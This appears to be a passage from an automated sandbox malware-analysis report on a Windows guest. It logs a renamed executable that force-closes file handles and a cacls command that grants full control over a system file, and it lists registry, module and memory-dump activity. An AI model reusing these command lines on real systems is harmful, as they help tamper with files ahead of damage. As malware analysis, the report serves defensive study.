| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
3 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 |
Process #198: mxkefu6a.exe
175
0
| Information | Value |
|---|---|
| ID | #198 |
| File Name | c:\users\fd1hvy\desktop\mxkefu6a.exe |
| Command Line | mxkeFu6a.exe -accepteula -c -y -p handles -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:22, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1394 |
| Parent PID | 0x1088 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F94
0x
13A8
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004080C0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040AE73 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040579A |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040B435 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00409AC9 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00406078 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040DEC6 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00410AB1 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00412434 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00416A09, 0x00415F2F, ... |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004048D4 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040C3C0, 0x004112CE |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004020F0 |
|
|
|
Host Behavior
File (7)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (164)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75e90000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x761b0000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x750d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75b70000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74b70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x744a0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\users\fd1hvy\desktop\mxkefu6a.exe, file_name_orig = C:\Users\FD1HVy\Desktop\mxkeFu6a.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x75efec50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75efeca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x75ea1170 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75efeac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75ea4be0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75efeb30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x75ea4610 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x75ea4a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75efeed0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75ea5490 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x75efed40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x75ea6520 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77c0a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75ea5a60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x75ea53b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x75ea6800 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x75ea5cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x75ea56c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75efed10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75ea4aa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75ea6740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75efeab0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75ea4f00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x75ea5b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75ea5010 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75efea10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75ea5bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x75ea4cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75ea50d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x75ea5ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x75ea5330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x75ea5b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75ea5b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75ea51b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75ea5090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x75eff5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75efef60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75ea5d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x75eff4c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75eff500 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75eff130 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77bfb2d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77bfb250 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x75ea6620 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77bf2dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77c129e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77c11ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x75ea3cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75ea5110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75ea5c40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x75ea6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x75ea57f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75eff450 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x75eff4a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75eff4e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75ea46b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75ea8820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77c16390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75ea5ac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77bdfb90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x75efee70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75eff180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75eff440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75ea5960 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x75eff090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x75ea5320 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x75ea68d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x75ea6720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75efebb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x75ea6760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x75ea67e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75ea6820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75ea6850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75ea6870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75ea6830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x75ea59c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75ea4ca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x75ea5160 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75ea4d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75ea51f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75ea7c10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75ea5da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75efea20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75ea5530 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x75ea4eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x75ea4c20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77bef630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x75eff0e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x761cee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x761cf910 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x761c8c80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x761cffa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x761cefb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x761cf530 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x761ce5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x761ce580 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x761cf460 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x761cf9b0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x761ced60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x761cf100 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x75106b00 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x75b747e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x75b74f70 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x75b74ef0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x75b73c10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x75b75c60 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x75b74810 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74b807d0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74b8e6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74b79080 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74b9ab40 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74b83570 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74ba09b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74ba2bec |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74b7d0c0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74b793b0 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x744a1590 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x744a1510 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x744a1570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75ea4ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x75ea4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75ea4b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75ea4b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75efebc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75efeb20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75efeb80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x75ea6700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x75ea6d30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77bfd7c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77bfb740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75ea6d70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77bfc0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77bfbe10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77c22b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77c152f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x75ea71b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75ea4510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7500d900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x75ea49a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x75ea7050 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75ea7760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x75ea7190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x75ea7780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x75ea72c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x75ea7440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75ea7480 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f9e260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75ea0db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x75ea5a20 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-04-17 10:42:50 (UTC) |
|
1 | |
| Get Time | type = Performance Ctr, time = 32353886399 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #199: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #199 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:22, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4bc |
| Parent PID | 0x1268 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1144
0x
1098
0x
EE8
|
Process #200: mxkefu6a.exe
0
0
| Information | Value |
|---|---|
| ID | #200 |
| File Name | c:\users\fd1hvy\desktop\mxkefu6a.exe |
| Command Line | mxkeFu6a.exe -accepteula "MsSense.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:22, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xaec |
| Parent PID | 0x9c0 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FE0
0x
1300
0x
570
|
Process #201: mxkefu6a.exe
0
0
| Information | Value |
|---|---|
| ID | #201 |
| File Name | c:\users\fd1hvy\desktop\mxkefu6a.exe |
| Command Line | mxkeFu6a.exe -accepteula "Workflow.Targets" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:22, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1278 |
| Parent PID | 0xf8c (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EC8
0x
11DC
0x
F78
|
Process #202: mxkefu6a.exe
0
0
| Information | Value |
|---|---|
| ID | #202 |
| File Name | c:\users\fd1hvy\desktop\mxkefu6a.exe |
| Command Line | mxkeFu6a.exe -accepteula "PhotoAcq.dll.mui" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:22, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1390 |
| Parent PID | 0xf58 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1368
0x
1310
0x
13BC
|
Process #203: mpcmdrun.exe
0
0
| Information | Value |
|---|---|
| ID | #203 |
| File Name | c:\program files\windows defender\mpcmdrun.exe |
| Command Line | "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:04:23, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x344 |
| Parent PID | 0x3f4 (c:\windows\system32\svchost.exe) |
